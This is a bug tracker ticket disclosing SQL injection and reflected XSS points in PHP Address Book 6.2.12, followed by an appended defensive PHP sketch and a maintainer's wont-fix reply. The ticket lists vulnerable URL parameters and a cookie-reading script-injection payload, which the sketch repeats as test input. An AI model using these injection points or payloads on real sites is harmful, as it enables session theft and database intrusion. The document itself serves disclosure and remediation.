#7 PHP Address Book 6.2.12 Multiple security vulnerabilities

v1.0_(example)
wont-fix
nobody
5
2012-10-28
2012-03-03
Anonymous
No

Hi,

I've found some XSS and SQL injection vulnerabilities in PHP Address Book 6.2.12:

// (Blind) SQL-Injection
http://[target]/addressbookv6.2.12/edit.php?id=[sql-injection]
http://[target]/addressbookv6.2.12/group.php?add=Add to&group=1&selected%5b%5d=132&to_group=[sql-injection]
http://[target]/addressbookv6.2.12/vcard.php?id=[sql-injection]

// XSS
http://[target]/addressbookv6.2.12/preferences.php?from='"</script><script>alert(document.cookie)</script>
http://[target]/addressbookv6.2.12/index.php?group='"</script><script>alert(document.cookie)</script>

Best regards,
sschurtz
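
A defensive sketch for the two parameter classes listed in the report (numeric `id` / `to_group` values, and the reflected `from` / `group` values), added here as an example and not taken from PHP Address Book's code. It assumes PHP 7.3+ with the pdo_sqlite extension; the function names and the `contacts` table are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example, not PHP Address Book code; the contacts table is hypothetical.

/** Accept only a positive integer (id, to_group); null means reject the request. */
function int_param(array $query, string $name): ?int
{
    $v = filter_var($query[$name] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

/** Fetch one row with a bound parameter rather than string concatenation. */
function find_contact(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, lastname FROM contacts WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Encode for HTML text and quoted attribute values. */
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Encode as a JavaScript string literal that is safe inside an inline <script>. */
function js(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE | JSON_THROW_ON_ERROR);
}

// Constructed request values modelled on the strings in the report.
$query = ['id' => '1 OR 1=1', 'from' => '\'"</script><script>alert(document.cookie)</script>'];

$db = new PDO('sqlite::memory:');   // in-memory stand-in for the real database
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE contacts (id INTEGER PRIMARY KEY, lastname TEXT)');
$db->exec("INSERT INTO contacts VALUES (1, 'Example')");

$id = int_param($query, 'id');               // non-numeric input never reaches SQL
$row = $id === null ? null : find_contact($db, $id);
echo $row === null ? "400 Bad Request\n" : html($row['lastname']) . "\n";
echo '<input name="from" value="' . html($query['from']) . "\">\n";
echo '<script>var from = ' . js($query['from']) . ";</script>\n";
```

The two encoders are not interchangeable: `html()` covers element text and quoted attributes, while a value written inside a `<script>` block needs `js()`, because HTML entity encoding alone does not make a string a safe JavaScript literal.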

Discussion

  • chatelao

    chatelao - 2012-10-28

    See v7.0.0 Bugs.

     
  • chatelao

    chatelao - 2012-10-28
    • status: open --> wont-fix
    • milestone: --> v1.0_(example)
     

